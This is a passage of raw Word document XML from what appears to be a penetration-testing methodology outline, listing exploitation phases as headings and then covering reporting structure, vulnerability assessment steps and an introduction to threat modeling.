        </w:rPr>
        <w:t>Network Service Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B652A" w:rsidRPr="000B652A" w:rsidRDefault="000B652A" w:rsidP="00CB22F5">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B652A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploitation of Weak credentials </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B652A" w:rsidRPr="000B652A" w:rsidRDefault="000B652A" w:rsidP="00CB22F5">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B652A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Password Spraying</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B652A" w:rsidRPr="000B652A" w:rsidRDefault="000B652A" w:rsidP="00CB22F5">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B652A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Exploitation of Host or Network Device Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B652A" w:rsidRPr="000B652A" w:rsidRDefault="000B652A" w:rsidP="00CB22F5">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B652A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B652A" w:rsidRPr="000B652A" w:rsidRDefault="000B652A" w:rsidP="00CB22F5">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B652A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Credential Compromise </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B652A" w:rsidRDefault="000B652A" w:rsidP="00CB22F5">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B652A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Lateral Movement (if in scope)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0087753C" w:rsidRDefault="0087753C" w:rsidP="0087753C">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00077055" w:rsidRPr="000B652A" w:rsidRDefault="00077055" w:rsidP="0087753C">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000B652A" w:rsidRDefault="00CD5DD5" w:rsidP="00CD5DD5">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Reporting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD5DD5" w:rsidRPr="00CD5DD5" w:rsidRDefault="00CD5DD5" w:rsidP="00570051">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD5DD5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>“If it’s not in the report it didn’t happen”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD5DD5" w:rsidRPr="00CD5DD5" w:rsidRDefault="00CD5DD5" w:rsidP="00570051">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD5DD5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">The Report will typically contain three distinct parts which </w:t>
      </w:r>
      <w:r w:rsidR="00570051">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">are targeted at specific </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD5DD5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>audiences.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD5DD5" w:rsidRPr="00570051" w:rsidRDefault="00CD5DD5" w:rsidP="00570051">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD5DD5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>A One-Page Executive Summary</w:t>
      </w:r>
      <w:r w:rsidR="00570051">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="00570051">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:r w:rsidRPr="00E24C3E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
        <w:t>Senior Leadership</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD5DD5" w:rsidRPr="00CD5DD5" w:rsidRDefault="00CD5DD5" w:rsidP="00570051">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD5DD5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Finding Summary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD5DD5" w:rsidRPr="00CD5DD5" w:rsidRDefault="00CD5DD5" w:rsidP="00570051">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD5DD5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>For Risk, Compliance and Initial socialization with technical personnel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD5DD5" w:rsidRPr="00CD5DD5" w:rsidRDefault="00CD5DD5" w:rsidP="00570051">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD5DD5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Detailed Technical Description of the Attack Narrative </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD5DD5" w:rsidRPr="00CD5DD5" w:rsidRDefault="00CD5DD5" w:rsidP="00570051">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD5DD5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:r w:rsidRPr="00E24C3E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
        <w:t>technical personnel</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD5DD5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> to understand, recreate and remediation any issues</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD5DD5" w:rsidRPr="00B8087C" w:rsidRDefault="00CD5DD5" w:rsidP="00570051">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009874C9" w:rsidRPr="00B8087C" w:rsidRDefault="009874C9" w:rsidP="000B652A">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009874C9" w:rsidRDefault="009874C9" w:rsidP="00AC500F">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009874C9" w:rsidRDefault="009874C9" w:rsidP="00AC500F">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009874C9" w:rsidRDefault="009874C9" w:rsidP="00AC500F">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B7213C" w:rsidRDefault="00B7213C" w:rsidP="00AC500F">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B7213C" w:rsidRDefault="00B7213C" w:rsidP="00AC500F">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B7213C" w:rsidRDefault="00B7213C" w:rsidP="00AC500F">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B7213C" w:rsidRDefault="00B7213C" w:rsidP="00AC500F">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B7213C" w:rsidRDefault="00B7213C" w:rsidP="00AC500F">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003D61F5" w:rsidRDefault="00AC500F" w:rsidP="00D106F0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00AC500F">
        <w:lastRenderedPageBreak/>
        <w:t>Vulnerability Assessment Methodology</w:t>
      </w:r>
      <w:r w:rsidR="00314660">
        <w:t xml:space="preserve">    (note: </w:t>
      </w:r>
      <w:r w:rsidR="005E6850">
        <w:t>exploitation</w:t>
      </w:r>
      <w:r w:rsidR="00314660">
        <w:t xml:space="preserve"> not in scope)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC500F" w:rsidRPr="00314C8D" w:rsidRDefault="00AC500F" w:rsidP="00AC500F">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00314C8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Prep</w:t>
      </w:r>
      <w:r w:rsidR="00314C8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">: scope – roles of </w:t>
      </w:r>
      <w:r w:rsidR="00AE334C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>engagement</w:t>
      </w:r>
      <w:r w:rsidR="00314C8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> – permission memo – kickoff meeting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC500F" w:rsidRPr="00314C8D" w:rsidRDefault="00AC500F" w:rsidP="00AC500F">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00314C8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Recon</w:t>
      </w:r>
      <w:r w:rsidR="00AE334C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>: OSINT – docs review – interviews with SMEs – Past reports</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC500F" w:rsidRPr="00314C8D" w:rsidRDefault="00AC500F" w:rsidP="00AE334C">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00314C8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Scanning / analysis</w:t>
      </w:r>
      <w:r w:rsidR="00AE334C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>: Host discovery – network mapping – service discovery – weak credential assessment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC500F" w:rsidRPr="00314C8D" w:rsidRDefault="00AE334C" w:rsidP="00AC500F">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00314C8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="00AC500F" w:rsidRPr="00314C8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>eporting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00F902DB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>executive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> summary – detailed technical report – finding </w:t>
      </w:r>
      <w:r w:rsidR="00F902DB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>review meeting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC500F" w:rsidRDefault="00AC500F" w:rsidP="00AC500F">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B7213C" w:rsidRDefault="00B7213C" w:rsidP="00AC500F">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B7213C" w:rsidRPr="00AC500F" w:rsidRDefault="00B7213C" w:rsidP="00AC500F">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC500F" w:rsidRDefault="004F440D" w:rsidP="004F440D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Threat Modeling</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F440D" w:rsidRPr="00593903" w:rsidRDefault="004F440D" w:rsidP="00052223">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00052223">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Threat modeling is used to identify threats and vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidR="00095902" w:rsidRPr="00052223">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00052223" w:rsidRPr="00052223">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">A systematic approach </w:t>
      </w:r>
      <w:r w:rsidR="00095902" w:rsidRPr="00052223">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidR="00052223" w:rsidRPr="00052223">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sed to u</w:t>
      </w:r>
      <w:r w:rsidR="00052223" w:rsidRPr="00593903">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">nderstand how different </w:t>
      </w:r>
      <w:r w:rsidR="00095902" w:rsidRPr="00593903">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>threats could be realized and how a successful compromise could take place.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00593903" w:rsidRPr="00593903" w:rsidRDefault="00593903" w:rsidP="00593903">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00593903">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Threat modeling enables informed decision making abou</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">t application security risk. In </w:t>
      </w:r>
      <w:r w:rsidRPr="00593903">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>addition to producing a model, typical threat modeling eff</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">orts also produce a prioritized </w:t>
      </w:r>
      <w:r w:rsidRPr="00593903">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>list of security improvements to the concept, requirements, design, or implementation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00593903" w:rsidRPr="00593903" w:rsidRDefault="00593903" w:rsidP="00593903">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00593903">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>As part of the design phase of the Software Development Life Cycle (SDLC), thre</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">at </w:t>
      </w:r>
      <w:r w:rsidRPr="00593903">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>modeling allows software architects to identify and mit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">igate potential security issues </w:t>
      </w:r>
      <w:r w:rsidRPr="00593903">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">early, when they are relatively easy and cost-effective </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">to resolve. Therefore, it helps </w:t>
      </w:r>
      <w:r w:rsidRPr="00593903">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>reduce the total cost of development.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00593903" w:rsidRDefault="00593903" w:rsidP="00593903">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00593903">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Threat modeling is a procedure for optimizing Networ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">k/Application/Internet Security </w:t>
      </w:r>
      <w:r w:rsidRPr="00593903">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>by identifying objectives and vulnerabilities and t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">hen defining countermeasures to </w:t>
      </w:r>
      <w:r w:rsidRPr="00593903">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">prevent, or mitigate the effects of, threats to the system. A threat is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">a potential or actual </w:t>
      </w:r>
      <w:r w:rsidRPr="00593903">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
